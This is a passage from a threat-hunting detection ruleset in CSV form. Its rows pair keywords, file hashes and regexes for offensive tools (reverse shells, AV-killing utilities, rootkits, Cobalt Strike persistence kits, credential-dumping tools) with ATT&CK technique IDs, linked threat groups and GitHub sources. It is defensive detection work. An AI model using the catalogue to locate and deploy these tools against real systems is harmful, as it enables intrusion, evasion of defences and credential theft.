Evasion","https://github.com/1y0n/AVKiller","1","0","#filehash","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","35139" "*BA9D2748-1342-41A3-87F2-343E82D99813*",".{0,1000}BA9D2748\-1342\-41A3\-87F2\-343E82D99813.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","35142" "*baa3a3f7c6a17963ab80baff6de74aca91e4e75fa0a4f80bf18af9a5622edec3*",".{0,1000}baa3a3f7c6a17963ab80baff6de74aca91e4e75fa0a4f80bf18af9a5622edec3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35143" "*baa689ba1163c0c06f50a93ffac5ed0e4494fef7f0091edb95fa1a76b1551a40*",".{0,1000}baa689ba1163c0c06f50a93ffac5ed0e4494fef7f0091edb95fa1a76b1551a40.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","35144" "*babelstrike.py 
-*",".{0,1000}babelstrike\.py\s\-.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","35146" "*BabelStrike-main*",".{0,1000}BabelStrike\-main.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","35147" "*BabySh4rk - MomySh4rk*",".{0,1000}BabySh4rk\s\-\sMomySh4rk.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#content","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","35149" "*bac0dc3ff787d4aa2989b0d899510c98a0a7ef5923c55860c70b27c96a1a3d19*",".{0,1000}bac0dc3ff787d4aa2989b0d899510c98a0a7ef5923c55860c70b27c96a1a3d19.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense 
Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","35150" "*bac188a072ffe2acbdd2d33035c3747b3febad807f5db13caa7b15bcb5bff415*",".{0,1000}bac188a072ffe2acbdd2d33035c3747b3febad807f5db13caa7b15bcb5bff415.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","35151" "*bac48f3c63a2e87f4acf5b6e71fc2e75b22b4a9c197e8a14414f07acd44c3622*",".{0,1000}bac48f3c63a2e87f4acf5b6e71fc2e75b22b4a9c197e8a14414f07acd44c3622.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","35152" "*bacd13f058e7510d63f1958a1aa67acea3e5f74059577dbdafe0420f74e69c05*",".{0,1000}bacd13f058e7510d63f1958a1aa67acea3e5f74059577dbdafe0420f74e69c05.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35153" 
"*bacd392be7fb78662fb91e354b4d6443e824d06ae47d4819b0cdf657c8e02eff*",".{0,1000}bacd392be7fb78662fb91e354b4d6443e824d06ae47d4819b0cdf657c8e02eff.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35154" "*Backdoor did not understand the request*",".{0,1000}Backdoor\sdid\snot\sunderstand\sthe\srequest.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","35155" "*Backdoor has been set up successfully*",".{0,1000}Backdoor\shas\sbeen\sset\sup\ssuccessfully.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","35156" "*Backdoor is already removed :)*",".{0,1000}Backdoor\sis\salready\sremoved\s\:\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","35157" "*Backdoor is already set up ;)*",".{0,1000}Backdoor\sis\salready\sset\sup\s\;\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","35158" "*Backdoor LNK*",".{0,1000}Backdoor\sLNK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","35159" "*Backdoor sent unrecognizable message:*",".{0,1000}Backdoor\ssent\sunrecognizable\smessage\:.{0,1000}","offensive_tool_keyword","TripleCross","A Linux 
eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","35160" "*Backdoor Setuped Successfully!*",".{0,1000}Backdoor\sSetuped\sSuccessfully!.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35161" "*Backdoor.*",".{0,1000}Backdoor\..{0,1000}","offensive_tool_keyword","backdoor keyword","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35162" "*backdoor.asp*",".{0,1000}backdoor\.asp.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35163" "*backdoor.aspx*",".{0,1000}backdoor\.aspx.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation 
tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35169" "*backdoor.jsp*",".{0,1000}backdoor\.jsp.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35171" "*backdoor.php*",".{0,1000}backdoor\.php.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35178" "*backdoor.sh -v * -p *",".{0,1000}backdoor\.sh\s\-v\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","35182" "*backdoor/traitor.go*",".{0,1000}backdoor\/traitor\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","1","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","35184" "*BackdoorableScript*",".{0,1000}BackdoorableScript.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","1","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","35204" "*--backdoor-all*",".{0,1000}\-\-backdoor\-all.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","35205" "*Backdoored PE file save*",".{0,1000}Backdoored\sPE\sfile\ssave.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","35206" "*Backdooring MSI files is currently not supported.*",".{0,1000}Backdooring\sMSI\sfiles\sis\scurrently\snot\ssupported\..{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","35207" "*BackdoorLNK*",".{0,1000}BackdoorLNK.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","35208" "*backdoorlnkdialog*",".{0,1000}backdoorlnkdialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","35209" 
"*backstab.exe*",".{0,1000}backstab\.exe.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35210" "*Backstab.sln*",".{0,1000}Backstab\.sln.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35211" "*backstab.x64.*",".{0,1000}backstab\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - 
Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","35212" "*backstab.x86.*",".{0,1000}backstab\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","35213" "*Backstab/Driverloading*",".{0,1000}Backstab\/Driverloading.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35214" "*Backstab-master*",".{0,1000}Backstab\-master.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35215" "*BackupOperatorToDA.cpp*",".{0,1000}BackupOperatorToDA\.cpp.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","35217" "*BackupOperatorToDA.exe*",".{0,1000}BackupOperatorToDA\.exe.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","35218" 
"*BackupOperatorToDA.sln*",".{0,1000}BackupOperatorToDA\.sln.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","35219" "*BackupOperatorToDA-master*",".{0,1000}BackupOperatorToDA\-master.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","35220" "*BackupPrivSAM \\*",".{0,1000}BackupPrivSAM\s\\\\.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - 
APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","N/A","10","10","164","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z","35221" "*backupprivsam.*",".{0,1000}backupprivsam\..{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 